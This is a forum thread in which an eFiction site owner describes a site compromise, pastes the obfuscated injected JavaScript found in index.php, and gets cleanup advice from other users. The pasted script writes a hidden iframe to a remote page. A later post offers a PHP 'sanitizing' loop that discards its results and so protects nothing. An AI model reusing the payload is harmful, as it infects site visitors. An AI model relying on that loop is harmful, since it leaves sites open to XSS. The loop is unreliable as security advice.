Hi to all,
after an XSS attack received by Russian hackers, i've updated eFiction to the latest release, 3.5.2. Today i received a different attack, but again XSS type.
My index.php was modified and in the $end PHP instruction, between ? and > i found this code:
DO NOT OPEN ANY LINKS IN THIS CODE - THIS IS A VIRAL CODE
<html><body><script language='JavaScript'>function revr(inp) {var message1 = inp; var before = ''; var after = ''; var message2=''; for (count=message1.length; count >= 0; count--)
message2+=message1.substring(count,count-1); var asd = document.write(before,message2,after); }var nn1 = 3120 + 652 / 5 * 6 - 526 - 3999 + 624 - 0.4 - .000000000000091; ;var fr = ">'nn1'=thgieh 'nn1'=htdiw '4=dis?php.og/ni.lilmucitfecanrof//:ptth'=crs emarfi<";function screenSize() {var w, h;w = (window.innerWidth ? window.innerWidth :(document.documentElement.clientWidth ? document.documentElement.clientWidth : document.body.offsetWidth)); h = (window.innerHeight ? window.innerHeight : (document.documentElement.clientHeight ? document.documentElement.clientHeight : document.body.offsetHeight)); return {w:w, h:h}; }var scr1 = screenSize().w;var scr2 = screenSize().h;if(scr1 > scr2) { revr(fr); } else {} </script></body></html>
So my $end instruction became ?{VIRAL_CODE}>
This cause of course a parse error, "unexpected ? on line X". After removed the viral code, how can i fix this definitely in order to defend eFiction by this type of XSS attack ?
My eFiction is equipped with Shoutbox... is it possible that the Shoutbox contains some unprotected $_POST input ?
No. They would have to have edited your files directly to insert between the ? and > in the index.php file. You need to check ALL of your files and folders for files that shouldn't be there. Pay close attention to your stories folder. You also need to change your passwords both for e-fiction and your site's hosting account.
Sure ?
I don't understand this choice about inserting the code in the $end tag... PHP is a Pre-Processor, when it find the "?" it stop automatically the script execution. If an hacker want to infect my users, he must insert the viral code in a part where it's executable.
So, you said to pay attention to stories folder. That folder contains 3000+ subfolders, so i'm looking for writing a PHP script in order to scans automatically all the subfolders in the stories folder. Is correct to say that in that subfolders mustn't be present .php, .js o .html files, but only .txt files and images folder ? Can be helpful if i create a PHP script that delete automatically all the files with these extensions ?
The stories folder is CHMOD'd to be accessible to anyone so it's the most vulnerable to being hacked. My guess is they weren't very good hackers or it was a bot adding the code. It probably just looked for that last closing > not realizing it was a php file not html. And I would scan the folders by hand. You can't write a script that would account for everything a hacker coulld have placed in that folder. The images folder may have a single js related to an images list.
I created and executed a PHP script that reveals:
- all the treefolders under /stories/ with file listing;
- all the files with extension not equal to ".txt";
- all the occurrences of <?php, <script type, or other strange tags in all .txt files;
... nothing ! Nothing to delete, there are no illegal files in the entire /stories/ folder and its subfolders.
I changed the FTP server password and MySQL password.
I changed also all the passwords for administrative accounts. Now all passwords are >= 12 alphanumerical characters.
Tammy, do you have other tips ?
Have you checked any other index files? I once got hacked and Javascript was inserted in every index file in all the folders. Even within eFiction, a lot of the folders have blank index files for security, so I'd check those too.
You might also want to check with your hosting provider to make sure it wasn't a wider attack than just your files.
Yes, i checked all the index.php and effectively they were infected. I substituted all the infected index.php files with eFiction default (empty index.php file, 0 bytes).
No, it wasn't an attack only for me. It was a massive attack. I experienced the same XSS attack in a website that i created recently. It was in a test phase, so i forgot to insert instructions like this:
foreach ($_GET as $get) {
strip_tags($get);
htmlentities($get);
}
I always use HTML Purifier, a great PHP library that filters XSS in $_GET and $_POST. I suggest it to you for eFiction 4.0, because it has also a white-list function (and so you can, for example, extract all permitted tags from a mysql query in eFiction tables).
@Xtramalt: In case you're using a windows system, you should also check your local computer for any infections, not just your webhost. I once was infected with a virus which I was able to delete successfully, but the malware had enough time to collect usernames and passwords for my website. A week later *all* my sites were hacked with viral code. Fortunately I only had to re-upload the php files and not the whole MySQL database. Enough work nevertheless. π
Steffen
If it was a massive attack, then I would guess it may not have been your files that were vulnerable.
